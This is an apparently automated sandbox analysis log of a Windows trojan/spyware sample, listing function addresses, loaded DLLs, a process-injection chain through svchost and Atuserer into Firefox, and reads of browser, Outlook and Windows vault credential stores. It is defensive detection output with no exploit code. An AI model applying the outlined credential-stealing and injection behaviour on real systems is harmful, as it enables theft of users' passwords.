                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F82F284_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30CF24_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE0CB54_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40C004_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3ADE04_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F58DBF4_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDCD1F4_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4AD004_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE12ED4_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5B2C04_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F452A04_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F8739A4_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2D34C4_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF132D4_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF70E94_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFF0E04_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEF0CC4_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F470C04_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0300B16B4_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F4B1B04_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2F1724_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F7516C4_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF16CC4_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F856304_2_02F85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F317EC4_2_02F317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFF7B04_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F314604_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFF43F4_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030095C34_2_030095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDD5B04_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF75714_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FEDAC64_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDDAAC4_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F85AA04_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE1AA34_2_02FE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB3A6C4_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFFA494_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF7A464_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB5BF04_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F7DBF94_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5FB804_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFFB764_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F438E04_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAD8004_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F499504_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5B9504_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD59104_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F49EB04_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F03FD24_2_02F03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F03FD54_2_02F03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFFFB14_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F41F924_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFFF094_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFFCF24_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB9C324_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5FDC04_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF7D734_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF1D5A4_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F43D404_2_02F43D40
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0496E4F67_2_0496E4F6
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049644207_2_04964420
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049724467_2_04972446
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049805917_2_04980591
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C05357_2_048C0535
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048DC6E07_2_048DC6E0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048BC7C07_2_048BC7C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048E47507_2_048E4750
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C07707_2_048C0770
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049520007_2_04952000
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049801AA7_2_049801AA
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049741A27_2_049741A2
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049781CC7_2_049781CC
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B01007_2_048B0100
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0495A1187_2_0495A118
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049481587_2_04948158
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049402C07_2_049402C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049602747_2_04960274
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048CE3F07_2_048CE3F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049803E67_2_049803E6
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497A3527_2_0497A352
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04960CB57_2_04960CB5
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B0CF27_2_048B0CF2
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C0C007_2_048C0C00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048D8DBF7_2_048D8DBF
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048BADE07_2_048BADE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0495CD1F7_2_0495CD1F
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048CAD007_2_048CAD00
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497CE937_2_0497CE93
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048D2E907_2_048D2E90
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497EEDB7_2_0497EEDB
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497EE267_2_0497EE26
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C0E597_2_048C0E59
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0493EFA07_2_0493EFA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B2FC87_2_048B2FC8
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048CCFE07_2_048CCFE0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04962F307_2_04962F30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04902F287_2_04902F28
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048E0F307_2_048E0F30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04934F407_2_04934F40
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048A68B87_2_048A68B8
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048EE8F07_2_048EE8F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048CA8407_2_048CA840
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C28407_2_048C2840
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C29A07_2_048C29A0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0498A9A67_2_0498A9A6
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048D69627_2_048D6962
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048BEA807_2_048BEA80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04976BD77_2_04976BD7
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497AB407_2_0497AB40
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497F43F7_2_0497F43F
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B14607_2_048B1460
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0495D5B07_2_0495D5B0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049775717_2_04977571
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049716CC7_2_049716CC
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497F7B07_2_0497F7B0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048B17EC7_2_048B17EC
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C70C07_2_048C70C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0496F0CC7_2_0496F0CC
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497F0E07_2_0497F0E0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049770E97_2_049770E9
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048CB1B07_2_048CB1B0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048F516C7_2_048F516C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0498B16B7_2_0498B16B
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048AF1727_2_048AF172
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C52A07_2_048C52A0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048DB2C07_2_048DB2C0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049612ED7_2_049612ED
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0490739A7_2_0490739A
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497132D7_2_0497132D
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048AD34C7_2_048AD34C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497FCF27_2_0497FCF2
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04939C327_2_04939C32
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048DFDC07_2_048DFDC0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C3D407_2_048C3D40
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04971D5A7_2_04971D5A
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04977D737_2_04977D73
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C9EB07_2_048C9EB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C1F927_2_048C1F92
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497FFB17_2_0497FFB1
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497FF097_2_0497FF09
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C38E07_2_048C38E0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0492D8007_2_0492D800
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_049559107_2_04955910
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048C99507_2_048C9950
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048DB9507_2_048DB950
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04905AA07_2_04905AA0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04961AA37_2_04961AA3
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0495DAAC7_2_0495DAAC
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0496DAC67_2_0496DAC6
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04977A467_2_04977A46
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497FA497_2_0497FA49
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04933A6C7_2_04933A6C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048DFB807_2_048DFB80
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_04935BF07_2_04935BF0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_048FDBF97_2_048FDBF9
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0497FB767_2_0497FB76
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_00831CB07_2_00831CB0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0082CC307_2_0082CC30
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0082AED07_2_0082AED0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0082CE507_2_0082CE50
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008352F07_2_008352F0
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008334CA7_2_008334CA
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0083353B7_2_0083353B
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_008335407_2_00833540
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_0084B8907_2_0084B890
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DE70C7_2_046DE70C
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DD7D87_2_046DD7D8
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DE2557_2_046DE255
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DE3737_2_046DE373
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DC9917_2_046DC991
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: 7_2_046DCA887_2_046DCA88
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: String function: 00360C63 appears 70 times
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: String function: 00368A80 appears 42 times
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: String function: 00347F41 appears 35 times
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: String function: 04907E54 appears 100 times
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: String function: 048F5130 appears 58 times
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: String function: 0492EA12 appears 86 times
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: String function: 0493F290 appears 105 times
                Source: C:\Windows\SysWOW64\Atuserer.exeCode function: String function: 048AB970 appears 283 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 109 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 283 times
                Source: RO2Y11yOJ7.exe, 00000002.00000003.1294518792.00000000041A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RO2Y11yOJ7.exe
                Source: RO2Y11yOJ7.exe, 00000002.00000003.1294669391.000000000434D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RO2Y11yOJ7.exe
                Source: RO2Y11yOJ7.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AA0F4 GetLastError,FormatMessageW,2_2_003AA0F4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003984F3 AdjustTokenPrivileges,CloseHandle,2_2_003984F3
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00398AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00398AA3
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_003AB3BF
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003BEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_003BEF21
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003AC423 CoInitialize,CoCreateInstance,CoUninitialize,2_2_003AC423
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_00344FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00344FE9
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeFile created: C:\Users\user\AppData\Local\Temp\aut92FB.tmpJump to behavior
                Source: RO2Y11yOJ7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Atuserer.exe, 00000007.00000003.1909973708.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000003.1910164552.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, Atuserer.exe, 00000007.00000002.3158332138.0000000000C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RO2Y11yOJ7.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\RO2Y11yOJ7.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeProcess created: C:\Windows\SysWOW64\Atuserer.exe "C:\Windows\SysWOW64\Atuserer.exe"
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RO2Y11yOJ7.exe"Jump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeProcess created: C:\Windows\SysWOW64\Atuserer.exe "C:\Windows\SysWOW64\Atuserer.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\Atuserer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RO2Y11yOJ7.exeStatic file information: File size 1324032 > 1048576
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RO2Y11yOJ7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avRLXQyosx.exe, 00000006.00000002.3160751775.000000000094E000.00000002.00000001.01000000.00000005.sdmp, avRLXQyosx.exe, 00000008.00000000.1743911480.000000000094E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: ATuserer.pdb source: svchost.exe, 00000004.00000003.1643151077.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1643067119.000000000281B000.00000004.00000020.00020000.00000000.sdmp, avRLXQyosx.exe, 00000006.00000002.3158765250.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
